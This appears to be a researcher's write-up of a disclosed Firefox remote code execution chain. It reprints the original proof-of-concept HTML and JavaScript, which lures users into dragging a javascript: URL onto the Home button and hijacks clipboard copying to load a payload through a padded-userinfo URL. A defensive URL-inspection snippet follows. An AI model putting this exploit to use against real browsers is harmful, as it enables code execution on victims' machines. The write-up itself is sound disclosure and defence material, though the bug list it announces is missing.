Firefox RCE by chaining small bugs


The Main Bug

The main bug that made this possible was a strange behavior where 'javascript:' URLs coming from bookmarks were turning into chrome windows after a refresh occurred. This gave me my first chance at potentially injecting arbitrary chrome code; achieving that would mean I had an RCE!
After some time I was able to come up with a highly user-interactive proof of concept, the best I could do given everything.

The following is the original PoC reported (note: localhost/q.js hosts the payload):

<!--
Decoded content of the base64 string passed to atob() further below:
-----------------------------------------------------------
<b>jQuery needs to be included first!<br>Hold down Shift+F2 and copy paste the below code into the input that appears and hit enter</b>
<br><br><br><input id="qc" style="width:300px;" value="inject 'http://jquery.cdn.mozilla.org'"/>


<script>
var pad=' '.repeat(1000);
var inj="inject 'http://jquery.cdn.mozilla.org"+pad+"@localhost/q.js'";

qc.oncopy=function(e){
e.clipboardData.setData('text/plain',inj)
e.preventDefault();
setTimeout("location.reload()",100)
}

qc.oncut=function(e){
e.clipboardData.setData('text/plain',inj)
e.preventDefault();
qc.value='';
setTimeout("location.reload()",100)
}
</script>

------------------------------------------------------------
 -->

<h3>A surprise is waiting for you...</h3>
<h2>Drag and drop the image below onto the small 'home' icon on the top right corner (choose yes). After that press the home button and further instructions will follow.</h2>
<img src="http://i.imgur.com/0PhK7.png" id="qimg"/>
<br><br><br>

<script>
// Dragging the image onto the Home button makes Firefox offer to set the
// dropped text as the home page. The text is "<decoy url>|javascript:...":
// the javascript: URL is the part that later ends up running in a chrome
// window after a refresh (the main bug). The atob() argument is the page
// shown decoded in the comment at the top of this file.
qimg.ondragstart=function(ev){

ev.dataTransfer.clearData();
ev.dataTransfer.setData('text/plain',"http://aPageThatTellsYouToGoToOtherTab.ltd|javascript:atob('PGI+alF1ZXJ5IG5lZWRzIHRvIGJlIGluY2x1ZGVkIGZpcnN0ITxicj5Ib2xkIGRvd24gU2hpZnQrRjIgYW5kIGNvcHkgcGFzdGUgdGhlIGJlbG93IGNvZGUgaW50byB0aGUgaW5wdXQgdGhhdCBhcHBlYXJzIGFuZCBoaXQgZW50ZXI8L2I+Cjxicj48YnI+PGJyPjxpbnB1dCBpZD0icWMiIHN0eWxlPSJ3aWR0aDozMDBweDsiIHZhbHVlPSJpbmplY3QgJ2h0dHA6Ly9qcXVlcnkuY2RuLm1vemlsbGEub3JnJyIvPgoKCjxzY3JpcHQ+CnZhciBwYWQ9JyAnLnJlcGVhdCgxMDAwKTsKdmFyIGluaj0iaW5qZWN0ICdodHRwOi8vanF1ZXJ5LmNkbi5tb3ppbGxhLm9yZyIrcGFkKyJAbG9jYWxob3N0L3EuanMnIjsKCnFjLm9uY29weT1mdW5jdGlvbihlKXsKZS5jbGlwYm9hcmREYXRhLnNldERhdGEoJ3RleHQvcGxhaW4nLGluaikKZS5wcmV2ZW50RGVmYXVsdCgpOwpzZXRUaW1lb3V0KCJsb2NhdGlvbi5yZWxvYWQoKSIsMTAwKQp9CgpxYy5vbmN1dD1mdW5jdGlvbihlKXsKZS5jbGlwYm9hcmREYXRhLnNldERhdGEoJ3RleHQvcGxhaW4nLGluaikKZS5wcmV2ZW50RGVmYXVsdCgpOwpxYy52YWx1ZT0nJzsKc2V0VGltZW91dCgibG9jYXRpb24ucmVsb2FkKCkiLDEwMCkKfQo8L3NjcmlwdD4=')");

}
</script>
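The `inject` command in the PoC hides its real host behind padded userinfo: `http://jquery.cdn.mozilla.org<1000 spaces>@localhost/q.js` reads like the trusted CDN, but the URL parser treats everything before the `@` as a username and sends the request to localhost. The following is an added example, not code from the original report, showing how a defender can flag that pattern with the WHATWG URL parser under Node.js; the `inspectUrl` function is my own, and the sample URL is constructed with a shorter pad than the PoC uses.

```javascript
// Added example (not from the original report): detect the "decoy host in the
// userinfo" trick used by the PoC's inject command. Runs under Node.js, where
// the WHATWG URL class is a global; no third-party modules needed.

// Something that looks like a hostname: dot-separated labels of [a-z0-9-].
const HOSTLIKE = /^[a-z0-9-]+(\.[a-z0-9-]+)+$/i;

// Parse one URL string and report where it really points versus what a
// human skimming the string is likely to read as the host.
function inspectUrl(raw) {
  let u;
  try {
    u = new URL(raw);
  } catch (e) {
    return { valid: false, reason: 'unparseable' };
  }
  // WHATWG parsing percent-encodes spaces in userinfo (space -> %20);
  // decode so we can measure the padding the attacker inserted.
  const userinfo = decodeURIComponent(u.username);
  const trimmed = userinfo.trim();
  const padding = userinfo.length - trimmed.length;
  const decoyHost = HOSTLIKE.test(trimmed) ? trimmed.toLowerCase() : null;
  // Either signal alone is worth a closer look; together they are the PoC.
  const suspicious = decoyHost !== null || padding > 0;
  return {
    valid: true,
    hostname: u.hostname, // where the request actually goes
    userinfo,             // raw text before the '@'
    decoyHost,            // hostname-shaped text a reader may take for the host
    padding,              // whitespace used to push "@real-host" out of view
    suspicious,
  };
}

// Constructed sample mirroring the report's payload URL (pad cut to 20 spaces).
const SAMPLE = 'http://jquery.cdn.mozilla.org' + ' '.repeat(20) + '@localhost/q.js';

console.log(inspectUrl(SAMPLE));
console.log(inspectUrl('https://jquery.cdn.mozilla.org/jquery.js'));
```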

In total there are four different bugs in play:

References:

The report: https://bugzilla.mozilla.org/show_bug.cgi?id=1318911